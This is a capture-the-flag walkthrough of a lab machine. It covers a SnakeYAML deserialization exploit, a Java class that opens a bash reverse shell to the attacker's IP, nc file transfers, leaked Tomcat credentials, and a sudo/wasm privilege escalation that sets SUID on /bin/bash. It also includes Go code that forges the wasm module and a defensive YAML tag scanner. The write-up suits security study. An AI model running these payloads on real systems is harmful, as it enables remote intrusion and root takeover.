Basic Info

Port Scan

22 and 8080:

$ nmap -sC -sV 10.10.10.227
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 13:16 CST
Nmap scan report for 10.10.10.227
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.12 seconds

8080

An online YAML parser:

A quick search turns up the well-known SnakeYAML payload. A "!!name" tag is shorthand for tag:yaml.org,2002:name, and SnakeYAML's default Constructor resolves any such name it does not recognise as a Java class to instantiate. The document below therefore makes the parser build a URLClassLoader pointing at our host and hand it to ScriptEngineManager, which uses ServiceLoader to look up META-INF/services/javax.script.ScriptEngineFactory on that classpath and instantiates every factory listed there:

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.6:4444/"]
]]
]
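As an added example (not part of the original writeup) of what makes this document dangerous: a small Go scanner that tokenises a YAML document, skipping quoted scalars and comments, and reports every "!!" tag outside the known schema, i.e. every tag SnakeYAML's default constructor would resolve to a Java class. The sample documents are constructed here (the payload above and a benign config); the tag allowlist is the core YAML schema plus SnakeYAML's own container tags and is an assumption of this example, not taken from SnakeYAML's source.

```go
package main

import (
	"fmt"
	"strings"
)

// Tags of the core YAML schema plus the container/scalar tags SnakeYAML defines
// itself (assumed allowlist). Any other "!!name" expands to tag:yaml.org,2002:name,
// which SnakeYAML's default Constructor treats as a Java class to instantiate.
var knownYAMLTags = map[string]bool{
	"str": true, "int": true, "float": true, "bool": true, "null": true,
	"map": true, "seq": true, "set": true, "omap": true, "pairs": true,
	"binary": true, "timestamp": true, "merge": true, "value": true,
}

// Constructed sample inputs: the payload from the writeup and a benign document
// whose only "!!" occurrences are schema tags, a comment, or quoted data.
const payloadDoc = `!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.6:7777/"]
]]
]`

const benignDoc = `name: !!str parser   # !!java.lang.Runtime in a comment is not a tag
port: !!int 8080
note: "!!java.net.URL quoted is data"
`

// tagChar reports whether c may continue a "!!" tag. Letters, digits, '.', '_'
// and '$' cover Java class names; anything else ends the token.
func tagChar(c byte) bool {
	return c == '.' || c == '_' || c == '$' ||
		(c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
}

// startsScalar reports whether a quote at this position opens a scalar rather
// than being an apostrophe inside a plain scalar (e.g. "it's").
func startsScalar(prev byte, atStart bool) bool {
	return atStart || strings.IndexByte(" \t\n:[{,-", prev) >= 0
}

// UnsafeTags returns, in order of first appearance, the "!!" tags in doc that are
// not in the known schema, i.e. the ones that would become Java class lookups.
// Text inside quoted scalars and comments is data, not a node tag, and is skipped.
func UnsafeTags(doc string) []string {
	var (
		out   []string
		seen  = map[string]bool{}
		quote byte // 0, '\'' or '"' while inside a quoted scalar
	)
	for i := 0; i < len(doc); i++ {
		c := doc[i]
		switch {
		case quote != 0:
			if c == '\\' && quote == '"' {
				i++ // skip the escaped character in a double-quoted scalar
			} else if c == quote {
				quote = 0
			}
		case (c == '\'' || c == '"') && startsScalar(byteBefore(doc, i), i == 0):
			quote = c
		case c == '#' && (i == 0 || strings.IndexByte(" \t\n", doc[i-1]) >= 0):
			for i < len(doc) && doc[i] != '\n' {
				i++ // comment runs to end of line
			}
		case c == '!' && i+1 < len(doc) && doc[i+1] == '!':
			j := i + 2
			for j < len(doc) && tagChar(doc[j]) {
				j++
			}
			tag := doc[i+2 : j]
			if tag != "" && !knownYAMLTags[tag] && !seen[tag] {
				seen[tag] = true
				out = append(out, tag)
			}
			i = j - 1
		}
	}
	return out
}

func byteBefore(s string, i int) byte {
	if i == 0 {
		return 0
	}
	return s[i-1]
}

func main() {
	for name, doc := range map[string]string{"payload": payloadDoc, "benign": benignDoc} {
		fmt.Printf("%s: unsafe tags %v\n", name, UnsafeTags(doc))
	}
}
```

A guard like this is only a stopgap in front of a parser you cannot change; on the server side the actual fix is to load untrusted YAML with SnakeYAML's SafeConstructor, which rejects these tags outright instead of resolving them to classes.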

payload

Take the payload from GitHub (the path below is artsploit's yaml-payload repo) and change the code:

Edit src/artsploit/AwesomeScriptEngineFactory.java. This class is the ScriptEngineFactory that ScriptEngineManager discovers through META-INF/services on the remote classpath, so whatever its constructor does runs on the target as soon as the factory is instantiated:

public AwesomeScriptEngineFactory() {
    // Array form avoids shell-quoting problems. "bash -c" is still required because
    // the >& /dev/tcp redirection is bash syntax, not something exec() understands.
    String[] cmd = {"bash", "-c", "bash -i >& /dev/tcp/10.10.14.6/4444 0>&1"};
    try {
        Runtime.getRuntime().exec(cmd);
    } catch (IOException e) {   // java.io.IOException is already imported in the original file
        e.printStackTrace();
    }
}

Then recompile and serve the src directory. The URL in the payload must end in "/" so that URLClassLoader treats it as a directory and fetches META-INF/services/javax.script.ScriptEngineFactory plus the .class file it names; if the target JVM is older than the local javac, add --release <version> so the class file is loadable:

javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python -m SimpleHTTPServer 7777   # Python 3: python3 -m http.server 7777

exploit

Start the listener, submit the payload to the parser on port 8080, and a shell comes back as the tomcat user:

# payload (the port now points at the HTTP server serving src/)
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.6:7777/"]
]]
]

# reverse shell listener, started before the payload is submitted
nc -lvvp 4444

tomcat to admin

The admin user's password is in Tomcat's configuration files (conf/tomcat-users.xml is the first place to look for credentials):

admin : whythereisalimit

user flag

admin can SSH straight in, which gives user.txt:

Privesc enumeration

sudo -l

sudo -l shows a Go file that can be run as root without a password:

Reading the code: it loads main.wasm from the current directory, calls the module's exported info function, and if the result is 1 runs deploy.sh, also from the current directory. Both paths are relative, so whoever controls the working directory controls both inputs. Pull the wasm file down to analyse it:

# attacker, first: receive the file
nc -lvvp 4444 > main.wasm
# target: send it
nc 10.10.14.6 4444 < main.wasm

wasm

Upload the wasm file to an online wasm-to-wat decompiler:

info returns 0; change it to 1, recompile on the same site and download the result:

index.go

package main

import (
	"fmt"
	wasm "github.com/wasmerio/wasmer-go/wasmer"
	"os/exec"
	"log"
)

func main() {
	// Relative path: resolved against the caller's working directory, not /opt/wasm-functions.
	bytes, _ := wasm.ReadBytes("main.wasm")

	instance, _ := wasm.NewInstance(bytes)
	defer instance.Close()
	// The only gate is the value the module's exported "info" function returns.
	init := instance.Exports["info"]
	result, _ := init()
	f := result.String()
	if f != "1" {
		fmt.Println("Not ready to deploy")
	} else {
		fmt.Println("Ready to deploy")
		// Also relative: a deploy.sh in the working directory runs as root under sudo.
		out, err := exec.Command("/bin/sh", "deploy.sh").Output()
		if err != nil {
			log.Fatal(err)
		}
		fmt.Println(string(out))
	}
}

Privilege escalation && root flag

Then, in any writable directory, put the modified main.wasm and a deploy.sh next to each other and run the sudo command. The simplest deploy.sh just sets the SUID bit on bash (revert it afterwards so it doesn't affect other players):

# run from a directory you can write to
wget http://10.10.14.6:7777/test.wasm -O main.wasm   # the modified module, served from the same HTTP server
echo "chmod +s /bin/bash" > deploy.sh
chmod 777 *                                           # not strictly needed: root reads the files regardless
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
bash -p                                               # SUID bash drops the elevated euid unless -p is given
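The privilege escalation above needs nothing from the target's main.wasm except an exported info function that returns 1, so instead of decompiling and recompiling on a web site you can emit the minimal module yourself. The following Go program is an added example, not code from the writeup or from the box: it writes main.wasm containing a single exported function `info: () -> i32` that returns the constant you choose (1 here), encoded section by section per the wasm binary format. The file name main.wasm comes from index.go; everything else is hand-assembled.

```go
package main

import (
	"bytes"
	"fmt"
	"os"
)

// uleb128 encodes an unsigned integer as LEB128; wasm uses it for counts and sizes.
func uleb128(v uint32) []byte {
	var out []byte
	for {
		b := byte(v & 0x7f)
		v >>= 7
		if v != 0 {
			b |= 0x80
		}
		out = append(out, b)
		if v == 0 {
			return out
		}
	}
}

// sleb128 encodes a signed integer as LEB128; the i32.const immediate uses it.
func sleb128(v int32) []byte {
	var out []byte
	for {
		b := byte(v & 0x7f)
		v >>= 7 // arithmetic shift keeps the sign
		done := (v == 0 && b&0x40 == 0) || (v == -1 && b&0x40 != 0)
		if !done {
			b |= 0x80
		}
		out = append(out, b)
		if done {
			return out
		}
	}
}

// section frames a section body with its id byte and LEB128 size.
func section(id byte, body []byte) []byte {
	out := append([]byte{id}, uleb128(uint32(len(body)))...)
	return append(out, body...)
}

// BuildInfoModule returns a complete wasm module that exports one function
// `info: () -> i32` returning value. No memory, imports or other exports are
// needed: index.go only calls Exports["info"] and compares the result to "1".
func BuildInfoModule(value int32) []byte {
	var m bytes.Buffer
	m.Write([]byte{0x00, 0x61, 0x73, 0x6d}) // "\0asm" magic
	m.Write([]byte{0x01, 0x00, 0x00, 0x00}) // binary format version 1
	// Type section (id 1): one functype with no params and one i32 result.
	m.Write(section(1, []byte{0x01, 0x60, 0x00, 0x01, 0x7f}))
	// Function section (id 3): one function, using type index 0.
	m.Write(section(3, []byte{0x01, 0x00}))
	// Export section (id 7): name "info", kind 0x00 (func), function index 0.
	exp := append([]byte{0x01, 0x04}, "info"...)
	exp = append(exp, 0x00, 0x00)
	m.Write(section(7, exp))
	// Code section (id 10): one body = no local decls, i32.const value, end.
	body := append([]byte{0x00, 0x41}, sleb128(value)...)
	body = append(body, 0x0b)
	code := append([]byte{0x01}, uleb128(uint32(len(body)))...)
	m.Write(section(10, append(code, body...)))
	return m.Bytes()
}

func main() {
	out := "main.wasm"
	if len(os.Args) > 1 {
		out = os.Args[1]
	}
	mod := BuildInfoModule(1)
	if err := os.WriteFile(out, mod, 0o644); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("wrote %s (%d bytes, info() -> 1)\n", out, len(mod))
}
```

Run it locally, serve the resulting main.wasm from the same HTTP server used for the Java payload, and fetch it into the working directory next to deploy.sh as shown above; the 37-byte module satisfies the `f != "1"` check in index.go without touching the original file.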
